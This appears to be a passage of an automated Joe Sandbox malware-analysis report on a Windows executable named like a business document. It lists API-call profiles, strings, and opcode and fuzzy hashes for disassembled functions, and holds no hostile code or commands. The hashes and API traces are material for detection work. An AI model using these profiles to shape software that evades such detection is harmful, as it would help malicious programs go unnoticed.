                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 208665112-3771769585
                                                        • Opcode ID: 28fd554d56a90fea7c429afdf9be35683d0c718789af3a0548bc37e7dfd83475
                                                        • Instruction ID: 750975130a4aad92f5b0ff2f2eb44441631035dca057eb02db357b6f21d5a71a
                                                        • Opcode Fuzzy Hash: 28fd554d56a90fea7c429afdf9be35683d0c718789af3a0548bc37e7dfd83475
                                                        • Instruction Fuzzy Hash: 8F11D535501128BFDB10AB70AC4AEEA77BCFB06711F0401BAF555D6192EF789EC1CA60
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00824F7A
                                                          • Part of subcall function 007E049F: timeGetTime.WINMM(?,75C0B400,007D0E7B), ref: 007E04A3
                                                        • Sleep.KERNEL32(0000000A), ref: 00824FA6
                                                        • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00824FCA
                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00824FEC
                                                        • SetActiveWindow.USER32 ref: 0082500B
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00825019
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00825038
                                                        • Sleep.KERNEL32(000000FA), ref: 00825043
                                                        • IsWindow.USER32 ref: 0082504F
                                                        • EndDialog.USER32(00000000), ref: 00825060
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1194449130-3405671355
                                                        • Opcode ID: 0abf5a81b4fe50623a1662d27da896ca7d097f0f057b8b8c74dcf67b712ceac8
                                                        • Instruction ID: bcc72a92d89cdee9f71ee27fd315667f3ee405833344d3cea8c49d34c8524276
                                                        • Opcode Fuzzy Hash: 0abf5a81b4fe50623a1662d27da896ca7d097f0f057b8b8c74dcf67b712ceac8
                                                        • Instruction Fuzzy Hash: 9221C374240605EFE7109F68FD88A263B69FB5A745F051028F205C21B2EF718D90D772
                                                        APIs
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • CoInitialize.OLE32(00000000), ref: 0082D5EA
                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0082D67D
                                                        • SHGetDesktopFolder.SHELL32(?), ref: 0082D691
                                                        • CoCreateInstance.OLE32(00852D7C,00000000,00000001,00878C1C,?), ref: 0082D6DD
                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0082D74C
                                                        • CoTaskMemFree.OLE32(?,?), ref: 0082D7A4
                                                        • _memset.LIBCMT ref: 0082D7E1
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0082D81D
                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0082D840
                                                        • CoTaskMemFree.OLE32(00000000), ref: 0082D847
                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0082D87E
                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 0082D880
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                        • String ID:
                                                        • API String ID: 1246142700-0
                                                        • Opcode ID: 4239bc4d7d41752ad4e00838d5dac1320c83557685e2c03d39b909832d0acb61
                                                        • Instruction ID: 19c2de25c3402659750dbd4f7ab87a4f521d2dcfd6f36dc94ac3233c2aafe911
                                                        • Opcode Fuzzy Hash: 4239bc4d7d41752ad4e00838d5dac1320c83557685e2c03d39b909832d0acb61
                                                        • Instruction Fuzzy Hash: 79B1FC75A00219EFDB04DFA4D888EAEBBB9FF49314B148469F909DB251DB34ED41CB50
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 0081C283
                                                        • GetWindowRect.USER32(00000000,?), ref: 0081C295
                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0081C2F3
                                                        • GetDlgItem.USER32(?,00000002), ref: 0081C2FE
                                                        • GetWindowRect.USER32(00000000,?), ref: 0081C310
                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0081C364
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0081C372
                                                        • GetWindowRect.USER32(00000000,?), ref: 0081C383
                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0081C3C6
                                                        • GetDlgItem.USER32(?,000003EA), ref: 0081C3D4
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0081C3F1
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0081C3FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: 54e3531429b4cd40c12ebb4182d5349d40a479728368b3fe763e587caf1fcf31
                                                        • Instruction ID: 5aeb7b107431e663f15185d08be2da7a872e1dee4cd273a8f222023c7b20fa08
                                                        • Opcode Fuzzy Hash: 54e3531429b4cd40c12ebb4182d5349d40a479728368b3fe763e587caf1fcf31
                                                        • Instruction Fuzzy Hash: 14513C75B40205AFDB18CFA9DD89AAEBBBAFF98310F14812DF619D6291D7709D40CB10
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,0084F910), ref: 0082A90B
                                                        • GetDriveTypeW.KERNEL32(00000061,008789A0,00000061), ref: 0082A9D5
                                                        • _wcscpy.LIBCMT ref: 0082A9FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 2820617543-1000479233
                                                        • Opcode ID: 4ec0d0c867ebb4d7cd608ac96e58504dc3002f14d5a4eb38a4e54b5c1811553b
                                                        • Instruction ID: 989f3ea6e4269a9fb9cf6e470c582c1f6f1c0dd2c21382c4f7b87abb09e4a6ae
                                                        • Opcode Fuzzy Hash: 4ec0d0c867ebb4d7cd608ac96e58504dc3002f14d5a4eb38a4e54b5c1811553b
                                                        • Instruction Fuzzy Hash: 07519E31108311DFC308EF15D89ABAEBBA5FF84304F10482DF69697292DB71D989CA93
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 008486FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID: 0R
                                                        • API String ID: 634782764-1916035689
                                                        • Opcode ID: b5e6bba73d15202a7793508c7a55feeeff5c394b921127b898752ea302da0df9
                                                        • Instruction ID: d0259d403821612e34477809fdaa5d38238820039ff8c4a7f06f6e12b99dbf38
                                                        • Opcode Fuzzy Hash: b5e6bba73d15202a7793508c7a55feeeff5c394b921127b898752ea302da0df9
                                                        • Instruction Fuzzy Hash: 8551B33050024CFFEF209B28CC89FAD7BA4FB15764F61412AFA15E61A1DF76A980DB51
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __i64tow__itow__swprintf
                                                        • String ID: %.15g$0x%p$False$True
                                                        • API String ID: 421087845-2263619337
                                                        • Opcode ID: 4c370b9f32ba8364654e344eb7f59e9db7e65146e3ec5ac37a5c9288482c8bce
                                                        • Instruction ID: c740b3de4e129a6135e1795ba34b6afc2d4cd8c459007f2aaf35a47745853d0f
                                                        • Opcode Fuzzy Hash: 4c370b9f32ba8364654e344eb7f59e9db7e65146e3ec5ac37a5c9288482c8bce
                                                        • Instruction Fuzzy Hash: 1F41B471600209EEEB24DF35D84AE7A73E8FF09300F2044AEE649D7391EE7999418B11
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0084755E
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00847565
                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00847578
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00847580
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0084758B
                                                        • DeleteDC.GDI32(00000000), ref: 00847594
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0084759E
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 008475B2
                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 008475BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                        • String ID: static
                                                        • API String ID: 2559357485-2160076837
                                                        • Opcode ID: 0614e4dd326fd59066fc7f5addbeea95ab20e034e6763e737f9441e32ab4d930
                                                        • Instruction ID: 3131567acb71b7b37d463a5462276e837f96fc3f751b82af983c83d54dab88dd
                                                        • Opcode Fuzzy Hash: 0614e4dd326fd59066fc7f5addbeea95ab20e034e6763e737f9441e32ab4d930
                                                        • Instruction Fuzzy Hash: 1E316C36105218BFDF129F64DC08FEA3B69FF0A360F120229FA15D61A1D735D811DBA4
                                                        APIs
                                                        • _memset.LIBCMT ref: 007E6E3E
                                                          • Part of subcall function 007E8B28: __getptd_noexit.LIBCMT ref: 007E8B28
                                                        • __gmtime64_s.LIBCMT ref: 007E6ED7
                                                        • __gmtime64_s.LIBCMT ref: 007E6F0D
                                                        • __gmtime64_s.LIBCMT ref: 007E6F2A
                                                        • __allrem.LIBCMT ref: 007E6F80
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007E6F9C
                                                        • __allrem.LIBCMT ref: 007E6FB3
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007E6FD1
                                                        • __allrem.LIBCMT ref: 007E6FE8
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007E7006
                                                        • __invoke_watson.LIBCMT ref: 007E7077
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                        • String ID:
                                                        • API String ID: 384356119-0
                                                        • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                        • Instruction ID: 3ec30c20f0a880527470fdd2be2a767765aa2d7b565a2f2bb93e73210fd1c3b7
                                                        • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                        • Instruction Fuzzy Hash: 19711776A02757EBD718EE6ADC45B6AB3A8BF18360F148229F514E72C1E778DD0087D0
                                                        APIs
                                                        • _memset.LIBCMT ref: 00822542
                                                        • GetMenuItemInfoW.USER32(00885890,000000FF,00000000,00000030), ref: 008225A3
                                                        • SetMenuItemInfoW.USER32(00885890,00000004,00000000,00000030), ref: 008225D9
                                                        • Sleep.KERNEL32(000001F4), ref: 008225EB
                                                        • GetMenuItemCount.USER32(?), ref: 0082262F
                                                        • GetMenuItemID.USER32(?,00000000), ref: 0082264B
                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00822675
                                                        • GetMenuItemID.USER32(?,?), ref: 008226BA
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00822700
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00822714
                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00822735
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                        • String ID:
                                                        • API String ID: 4176008265-0
                                                        • Opcode ID: 2167f0f1f86e19ff3192095976931475cdc04adb64bd5fff2e40ab9a6094707c
                                                        • Instruction ID: beda0af58a365b23f0248bbbc22f292358035800defe69885d30e77da040a33c
                                                        • Opcode Fuzzy Hash: 2167f0f1f86e19ff3192095976931475cdc04adb64bd5fff2e40ab9a6094707c
                                                        • Instruction Fuzzy Hash: 7361BD75900269BFDB21CFA8EC88EBE7BB8FB01308F544059E942E7251D731AD85DB21
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00816BBF
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00816C18
                                                        • VariantInit.OLEAUT32(?), ref: 00816C2A
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00816C4A
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00816C9D
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00816CB1
                                                        • VariantClear.OLEAUT32(?), ref: 00816CC6
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00816CD3
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00816CDC
                                                        • VariantClear.OLEAUT32(?), ref: 00816CEE
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00816CF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: 19eef0e5d666e558036a9b2c5680aa2ef4900292b32b7a05b8a49d8d355b1fcd
                                                        • Instruction ID: bf3548893f4aba61a43101c98d9038870fe00a945073d701e730954502d2a1e2
                                                        • Opcode Fuzzy Hash: 19eef0e5d666e558036a9b2c5680aa2ef4900292b32b7a05b8a49d8d355b1fcd
                                                        • Instruction Fuzzy Hash: 74413075A00219DFCF00DF68D848DEEBBB9FF48354F008069EA95E7261DB34A955CB94
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • GetSystemMetrics.USER32(0000000F), ref: 0084D47C
                                                        • GetSystemMetrics.USER32(0000000F), ref: 0084D49C
                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0084D6D7
                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0084D6F5
                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0084D716
                                                        • ShowWindow.USER32(00000003,00000000), ref: 0084D735
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0084D75A
                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0084D77D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                        • String ID: 0R
                                                        • API String ID: 1211466189-1916035689
                                                        • Opcode ID: f354fa954fdfd1e9f571eefbcc9450ab38c0203d1ca4c9b531b46cbec00cb860
                                                        • Instruction ID: c6c1597ca12880ce54e1a4bf11b51d0e27e774ba486f1e61fe9c1c721f6e0fd7
                                                        • Opcode Fuzzy Hash: f354fa954fdfd1e9f571eefbcc9450ab38c0203d1ca4c9b531b46cbec00cb860
                                                        • Instruction Fuzzy Hash: 68B16975600229EFDF14CF68C9857A97BB1FF08711F09C169ED48DB296EB34A950CBA0
                                                        APIs
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • CoInitialize.OLE32 ref: 00838403
                                                        • CoUninitialize.OLE32 ref: 0083840E
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00852BEC,?), ref: 0083846E
                                                        • IIDFromString.OLE32(?,?), ref: 008384E1
                                                        • VariantInit.OLEAUT32(?), ref: 0083857B
                                                        • VariantClear.OLEAUT32(?), ref: 008385DC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 834269672-1287834457
                                                        • Opcode ID: 0e56d8889bdb37223b18d2e6bbd1462d87b54ec8ef6e17a31baf8425b64b3567
                                                        • Instruction ID: 344ab6444cc1371c0341c95c71afc0f9c66f02d16628d2c5172dab7a3df61214
                                                        • Opcode Fuzzy Hash: 0e56d8889bdb37223b18d2e6bbd1462d87b54ec8ef6e17a31baf8425b64b3567
                                                        • Instruction Fuzzy Hash: 2F614471608312EFC710DF24C848A6ABBE8FF89754F00481DF985DB291DB64E948CB96
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00835793
                                                        • inet_addr.WSOCK32(?,?,?), ref: 008357D8
                                                        • gethostbyname.WSOCK32(?), ref: 008357E4
                                                        • IcmpCreateFile.IPHLPAPI ref: 008357F2
                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00835862
                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00835878
                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008358ED
                                                        • WSACleanup.WSOCK32 ref: 008358F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                        • String ID: Ping
                                                        • API String ID: 1028309954-2246546115
                                                        • Opcode ID: 1ac5183d23eccee5d58167806473615c22cdfe35704ea23a4ff294beb5a9c7d1
                                                        • Instruction ID: 16d23c761245f5c9b50ded159b1fa97dd005a161463fb0c8fa79f6d5a0f4717d
                                                        • Opcode Fuzzy Hash: 1ac5183d23eccee5d58167806473615c22cdfe35704ea23a4ff294beb5a9c7d1
                                                        • Instruction Fuzzy Hash: C1516C31604600DFDB119F25DC49B6ABBE4FF89724F04492DFA96DB2A1DB74E940CB82
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0082B4D0
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0082B546
                                                        • GetLastError.KERNEL32 ref: 0082B550
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0082B5BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
